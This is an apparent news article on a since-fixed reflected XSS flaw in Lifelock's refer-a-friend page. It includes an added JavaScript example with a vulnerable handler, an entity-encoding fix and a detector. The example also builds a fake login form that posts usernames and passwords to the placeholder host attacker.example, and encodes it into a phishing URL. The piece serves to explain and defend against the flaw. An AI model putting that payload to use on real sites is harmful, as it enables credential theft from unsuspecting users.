A vulnerability discovered by security researchers Eric Taylor and Blake Welsh could turn an innocuous “refer-a-friend” page into an official-looking phishing page. By appending URL-encoded HTML to an ordinary refer-a-friend link, Taylor and Welsh were able to make the page render a fake Lifelock login form that could capture usernames and passwords from unsuspecting users.
Lifelock closed the vulnerability, a cross-site scripting (XSS) flaw, after Taylor notified the company. Lifelock has over 3 million customers and revenue of $369.65 million. As of 2010, Lifelock’s CEO Todd Davis has been targeted for identity theft over a dozen times.
As shown in the screenshot above, Taylor was able to produce a very simple login page by appending a long encoded string to the refer-a-friend URL on Lifelock. The “name” field reflected into the page could in fact contain any data, including joke names or more complex HTML, because the value was not encoded before being placed in the page.
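The following is an added illustration of the pattern described above, not Lifelock’s code or the researchers’ payload. The article only says that a “name” value from the URL was reflected into the refer-a-friend page; the endpoint path (`/refer`), the query-parameter name (`name`), the surrounding HTML and the placeholder `attacker.example` host are all assumptions made for the example. It shows a page handler that pastes the decoded parameter straight into the markup, the same handler with the value entity-encoded, and a crafted URL that carries a fake login form in its query string.

```javascript
// Added example, not Lifelock's code. Endpoint path, parameter name and
// surrounding HTML are assumptions; the collector host is a placeholder.

// Minimal HTML entity encoder for text placed inside an element body.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable version: the "name" parameter is percent-decoded by the URL
// parser and pasted straight into the page, so encoded HTML in the query
// string comes back to the browser as live markup.
function renderReferPageVulnerable(fullUrl) {
  const name = new URL(fullUrl).searchParams.get('name') || 'a friend';
  return `<html><body><h1>${name} invited you to join</h1></body></html>`;
}

// Hardened version: identical page, but the reflected value is entity-encoded
// before it is interpolated, so "<form" arrives as the text "&lt;form".
function renderReferPageSafe(fullUrl) {
  const name = new URL(fullUrl).searchParams.get('name') || 'a friend';
  return `<html><body><h1>${escapeHtml(name)} invited you to join</h1></body></html>`;
}

// Constructed payload: a fake login form posting to an attacker-controlled
// host (placeholder). It is stored as plain HTML here; buildAttackUrl()
// percent-encodes it when placing it in the query string.
const fakeLoginForm =
  '<form action="https://attacker.example/collect" method="POST">' +
  'Session expired. Username <input name="u"> ' +
  'Password <input name="p" type="password"> ' +
  '<input type="submit" value="Log in"></form>';

// Builds the malicious link: URLSearchParams.set() percent-encodes the
// value, which is the "long string of characters" appended to the URL.
function buildAttackUrl(baseUrl) {
  const u = new URL(baseUrl);
  u.searchParams.set('name', fakeLoginForm);
  return u.toString();
}

// Detection helper: does the rendered HTML contain an injected <form> element?
function containsInjectedForm(html) {
  return /<form\b/i.test(html);
}

// Demo run (hypothetical site and path).
const attackUrl = buildAttackUrl('https://www.example.com/refer?name=Bob');
console.log('Crafted URL:', attackUrl);
console.log('Vulnerable page injects form:', containsInjectedForm(renderReferPageVulnerable(attackUrl)));
console.log('Hardened page injects form:  ', containsInjectedForm(renderReferPageSafe(attackUrl)));
```

The crafted URL looks like a legitimate link to the real site, which is what makes the resulting page convincing: the browser address bar shows the genuine domain while the page body contains the attacker's form. Entity-encoding the reflected value at the point where it is written into HTML is the fix; the same value would need different encoding if it were placed inside an attribute, a script block or a URL.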
“I found it while simply browsing…